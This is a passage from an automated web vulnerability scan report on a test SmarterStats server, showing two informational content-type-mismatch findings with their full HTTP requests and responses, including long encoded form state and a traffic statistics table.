aGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhwFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK+KPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwABBgDAO10TRc0IBQRGb2NEBgAANoy3N80IBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQNFUlNoBRJOYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAITDxYCHwVoZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBgUWY3RsMDAkTVBIJFJhZFN0YXJ0RGF0ZQUfY3RsMDAkTVBIJFJhZFN0YXJ0RGF0ZSRjYWxlbmRhcgUfY3RsMDAkTVBIJFJhZFN0YXJ0RGF0ZSRjYWxlbmRhcgUUY3RsMDAkTVBIJFJhZEVuZERhdGUFHWN0bDAwJE1QSCRSYWRFbmREYXRlJGNhbGVuZGFyBR1jdGwwMCRNUEgkUmFkRW5kRGF0ZSRjYWxlbmRhcrDtRIMixWRxu5uOEBNfUyZm0c7ft24f7qaegzfzx9gP|53|asyncPostBackControlIDs||ctl00$MPH$btnGenerateReport,,ctl00$MPH$btnShowReport,|0|postBackControlIDs|||61|updatePanelIDs||tctl00$BPH$UpdatePanel2,,tctl00$UpdatePanel1,,tctl00$MPH$UP1,|0|childUpdatePanelIDs|||58|panelsToRefreshIDs||ctl00$BPH$UpdatePanel2,,ctl00$UpdatePanel1,,ctl00$MPH$UP1,|2|asyncPostBackTimeout||90|90|formAction||frmViewReports.aspx?Custom=False&ReportType=ReportItem&subReportName=ADMIN_Traffic_Summary|26|pageTitle||View Report - SmarterStats|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|

10.4. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/AboutThisFolder.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/AboutThisFolder.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /App_Themes/AboutThisFolder.txt HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:52 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: "1CB66497A424400"
Vary: Accept-Encoding
Content-Type: text/plain
Content-Length: 29
Connection: Close

...This folder contains skins

10.5. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}
Content-Length: 6928

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24MPH%24btnShowReport&__EVENTTARGET=ctl00%24MPH%24btnShowReport&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTIyNzU0MjE4NQ8WBh4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHg9yZXBvcnREaXNwbGF5ZWRnFgJmD2QWAgIBD2QWDAIDD2QWAgIBD2QWAgIBD2QWAmYPZBYIAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHhdDbGllbnRTaWRlU2NyaXB0T25DbGljawUSRW1haWxSZXBvcnRQb3B1cCgpZGQCBQ8PFgIfBAUTRXhwb3J0UmVwb3J0UG9wdXAoKWRkAgcPDxYCHwQFElByaW50UmVwb3J0UG9wdXAoKWRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFhoCAw8PFhAeDFNlbGVjdGVkRGF0ZQYAQH4OpTDNCB4HTWluRGF0ZQYAQMr4o%2BjgBx4HTWF4RGF0ZQYAAGjBKVyhCR4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeCENzc0NsYXNzBRJEYXRlUGlja2VyT3ZlcnJpZGUeBF8hU0ICAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR4NT3JpZ2luYWxWYWx1ZQUVMTAvMy8yMDEwIDEyOjAwOjAwIEFNHwYFEzIwMTAtMTAtMDMtMDAtMDAtMDAeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8KaB8IBgBAyvij6OAHZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawU8cmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9SYWRTdGFydERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhoFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK%2BKPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAIHDw8WEB8HBgDA%2BAxcNc0IHwgGAEDK%2BKPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fBgUTMjAxMC0xMC0wOS0wMC0wMC0wMB8QBQdyaUxhYmVsHxFoHwpoHwgGAEDK%2BKPo4AdkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhoFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK%2BKPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAILDxYCHwNoZAINDxYCHwNoZAIPDxYCHwNoZAIRDxYCHwNoZAITDxYCHwNoZAIXDxYCHwNoZAIZDxYCHwNoFgICAQ8QZGQWAGQCGw8WAh8DaGQCHQ8WAh8DaGQCHw8WAh8DaGQCIQ8PFgIfBgUKR2V0IFJlcG9ydGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBRZjdGwwMCRNUEgkUmFkU3RhcnREYXRlBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBRRjdGwwMCRNUEgkUmFkRW5kRGF0ZQUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXIFHWN0bDAwJE1QSCRSYWRFbmREYXRlJGNhbGVuZGFyvU7iaHYBbKQeGtHw6kNdeUAPWDYACUzT5UpfA6p01Wc%3D&ctl00%24MPH%24RadStartDate=2010-10-03&ctl00_MPH_RadStartDate_dateInput_text=10%2F3%2F2010&ctl00%24MPH%24RadStartDate%24dateInput=2010-10-03-00-00-00&ctl00_MPH_RadStartDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadStartDate_calendar_SD=%5B%5D&ctl00_MPH_RadStartDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadStartDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24RadEndDate=2010-10-09&ctl00_MPH_RadEndDate_dateInput_text=10%2F9%2F2010&ctl00%24MPH%24RadEndDate%24dateInput=2010-10-09-00-00-00&ctl00_MPH_RadEndDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadEndDate_calendar_SD=%5B%5D&ctl00_MPH_RadEndDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadEndDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24hfDMFilename=&ctl00%24MPH%24hfDMReport=&ctl00_MPH_mnuTable_rowCount_10_CB=on&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:27 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 45388

1|#||4|625|updatePanel|ctl00_BPH_UpdatePanel2|
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       |11|updatePanel|ctl00_UpdatePanel1|
               
           |312|updatePanel|ctl00_MPH_UpdatePanel1|
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               |38138|updatePanel|ctl00_MPH_UP1|
           <div class="Report"><div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Top Pages</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Top_Pages"> <div class='ReportChart'><img src="/Temp/3022c349e42e4a16915d331a96969eb5.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>Page</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fapptesting.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>apptesting.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
24,906</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
14</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
1,494</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol '>
<div class='percent percent8'></div>
7,968</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
676</td>
<td class='ar percentcol rc'>
<div class='percent percent7'></div>
431</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fdefault.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>default.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent7'></div>
6,980</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
33</td>
<td class='ar percentcol rc'>
<div class='percent percent6'></div>
361</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcloudscandetails.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>cloudscandetails.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent7'></div>
6,732</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent8'></div>
502</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsales.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sales.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,573</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent6'></div>
354</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2flearning.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>learning.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,573</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
17</td>
<td class='ar percentcol rc'>
<div class='percent percent4'></div>
270</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsitemap.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sitemap.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,332</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent3'></div>
192</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fria.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>ria.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,091</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
161</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2ftest.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>test.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent3'></div>
3,121</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
153</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2freport.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>report.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
2,122</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
20</td>
<td class='ar percentcol rc'>
<div class='percent percent11'></div>
665</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Other Items (13)</td>
<td class='FooterTotal ar percentcol'>707</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>10</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>4,594</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar percentcol'>3,048</td>
<td class='FooterAverages ar percentcol'>&nbsp;</td>
<td class='FooterAverages ar rc percentcolrc'>200</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Referring Sites</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ReferringSites"> <div class='ReportChart'><img src="/Temp/b2972344c54b45e38070638051bc9478.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Host</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'>No Referrer <i>(bookmark or direct-entry)</i></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
681</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '><a href="http://www.sitetalk-world.info" target="_blank" class='ReportLink'>www.sitetalk-world.info</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '><a href="http://www.vilnerable.smarterstats.6.0.host" target="_blank" class='ReportLink'>www.vilnerable.smarterstats.6.0.host</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '><a href="http://yandex.ru" target="_blank" class='ReportLink'>yandex.ru</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '><a href="http://seo.vilnerable.smarterstats.6.0.host" target="_blank" class='ReportLink'>seo.vilnerable.smarterstats.6.0.host</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '><a href="http://www.sitetalk-friends.com" target="_blank" class='ReportLink'>www.sitetalk-friends.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

